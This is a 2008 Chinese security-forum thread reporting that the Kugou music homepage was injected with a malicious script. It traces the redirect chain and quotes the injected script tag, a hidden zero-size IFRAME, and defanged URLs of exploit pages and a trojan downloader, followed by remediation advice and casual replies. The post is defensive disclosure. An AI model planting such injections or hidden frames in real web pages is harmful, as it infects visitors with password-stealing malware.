» 游客:  注册 | 登录 | 帮助  微点交流论坛 » 主动防御 » 故技重施：酷狗音乐首页再次挂马 2008-8-4 16:43   作者: 标题: 故技重施：酷狗音乐首页再次挂马 2008-8-4 16:43 点饭的百度空间 银牌会员 积分 2315 发帖 2236 注册 2007-11-30 #1  故技重施：酷狗音乐首页再次挂马 2008-8-4 16:43 2008年6月20日 星期五 17:30  用酷狗听歌遭遇恶意木马 地狱男爵HellBoy http://bbs.micropoint.com.cn/sho ... 9%B6%C8%BF%D5%BC%E4 2008年08月4日 星期一 16:43 故技重施：酷狗音乐首页再次挂马 【yimike】挂的很隐蔽，但是还是老伎俩，详见：http://hi.baidu.com/yimike/blog/ ... f6fa17b31bba89.html 这次（8月4日）挂马流程简单入下： h**p://www.kugou.com/home/cairing.htm =>h**p://js.allko.com/js.aspx     =>h**p://www.allko.com/index.aspx?id=0&n=0.23103216425319184         =>h**p://www.qqwill.com/         =>h**p://www.qqker.com/ 详细点分析如下： h**p://www.kugou.com/home/cairing.htm 被插入一个Script： <SCRIPT src="h**p://js.allko.com/js.aspx"></SCRIPT> h**p://js.allko.com/js.aspx的源代码如下： (详见原文:http://hi.baidu.com/yimike/blog/ ... c92094bfb51aa.html) 执行这个脚本后，第一次访问该页面时会写入一个IFRAME到h**p://www.kugou.com/home/cairing.htm，即： <IFRAME id=cif111 src="h**p://www.allko.com/index.aspx?id=0&n=0.23103216425319184" width=0 height=0></IFRAME> 然后当浏览器访问这里的h**p://www.allko.com/index.aspx?id=0&n=0.23103216425319184时，远程服务器会返回两个挂马URL，即：    其中，域名allko.com、qqwill.com、qqker.com三个域名指向的主机IP(61.157.109.66 / 四川省宜宾市电信)相同。 qqwill.com挂马详情如下： Log is generated by FreShow. h**p://www.qqwill.com/     h**p://g.ggg002.cn/du1.htm         h**p://g.ggg002.cn/ghost.html             h**p://user1.asp-33.cn/ie.swf                 h**p://user1.12-73.cn/bak4.css             h**p://user1.asp-33.cn/ff.swf                 h**p://user1.12-73.cn/bak4.css             [script]h**p://user1.asp-33.cn/ms06014.js                 h**p://user1.12-73.cn/bak.css             h**p://user1.asp-33.cn/GLWORLD.html                 h**p://tw.us.tw/us.exe（无法解析域名）             h**p://user1.asp-33.cn/real.js（0 Byte）             h**p://user1.asp-33.cn/Real.html                 h**p://tw.us.tw/us.exe             h**p://user1.asp-33.cn/Qvod.html                 h**p://tw.us.tw/us.exe bak.css和bak4.cssMD5相同，运行后连接到h**p://t.txt-01.cn/d.txt，下载盗号木马等33只。 qqker.com尚在建设中，今天（8月4日）下午4点检查时未发现恶意代码。 如何解决此威胁？ 对于酷狗官方来说，暂时的解决办法是清除cairing.htm源代码中被插入的恶意Script。让后再查找服务器漏洞，避免再次被植入恶意代码。 对于普通用户来说，建议如下： 1.卸载酷狗音乐，并将h**p://www.kugou.com屏蔽。该站点多次被植入恶意代码，但并未引起官方的重视。就冲着酷狗官方这种对用户不负责任的态度，不用酷狗也无所谓。 2.即时更新杀毒软件病毒库到最新，并开启实时监视。 3..打全系统补丁，更新Flash插件、联众世界、Realplayer、QVOD、迅雷看看等软件到最新。 [ Last edited by 点饭的百度空间 on 2008-8-4 at 21:02 ] ※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 你的微笑 is 微点的骄傲！ http://hi.baidu.com/new/micropoint 2008-8-4 20:41 stht1986 银牌会员 积分 2114 发帖 2108 注册 2008-7-5 #2   从来不用那种东西 ※ ※ ※ 本文纯属【stht1986】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 破解无罪 盗版有理 2008-8-5 08:59 kangdell 注册用户 积分 159 发帖 159 注册 2008-6-8 #3   酷狗是有点问题  建议用千千静听  酷我音乐盒  QQ音乐 ※ ※ ※ 本文纯属【kangdell】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 没有最好，只有更好 2008-8-5 10:15 408983504 银牌会员 此用户已被禁言 积分 1271 发帖 1238 注册 2007-1-6 来自 广东 #4   听歌我只用TT ※ ※ ※ 本文纯属【408983504】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 三用户版续费真TM的便宜啊！ 2008-8-5 11:07 小春哥 中级用户 积分 202 发帖 202 注册 2008-5-6 #5  酷我音乐盒很不错 ※ ※ ※ 本文纯属【小春哥】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 急切盼望微点推出扫描那一天！我的心在等待！ 2008-8-5 16:43 微点专家 版主 Weizi 积分 11554 发帖 11458 注册 2006-8-27 来自 贵阳 #6   酷我音乐盒 比酷狗好多了。 ※ ※ ※ 本文纯属【微点专家】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 做个性的自己 2008-8-5 18:27 ldy232003 新手上路 积分 17 发帖 17 注册 2008-7-16 来自 石家庄 #7   不会啊  我就装着酷狗  酷我 千千静听   什么都装着呢   没出问题啊 ※ ※ ※ 本文纯属【ldy232003】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 北京连邦软件河北分公司 2008-8-6 11:32 微点专家 版主 Weizi 积分 11554 发帖 11458 注册 2006-8-27 来自 贵阳 #8     Quote: Originally posted by ldy232003 at 2008-8-6 11:32: 不会啊  我就装着酷狗  酷我 千千静听   什么都装着呢   没出问题啊 楼主没有说软件，说的是首页 ※ ※ ※ 本文纯属【微点专家】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 做个性的自己 2008-8-7 07:12 farproc 注册用户 积分 135 发帖 135 注册 2007-5-8 #9   用谷歌音乐吧.挺好. ※ ※ ※ 本文纯属【farproc】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2008-8-7 11:12 论坛跳转: 微点软件公测区 安全快报  > 病毒快报  > 漏洞快报 微点产品在线技术支持  > 微点主动防御软件  > 预升级反馈专区  > 微点杀毒软件 微点用户交流区  > 微点新闻  > 微点软件使用交流  > 微点茶室 安全技术交流区  > 主动防御  > 反病毒  > 防火墙 综合区  > 电脑&数码  > 体育&娱乐&休闲  > 灌水区 版务管理 内部使用专区  可打印版本 | 推荐 | 订阅 | 收藏 [ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司 闽ICP备05030815号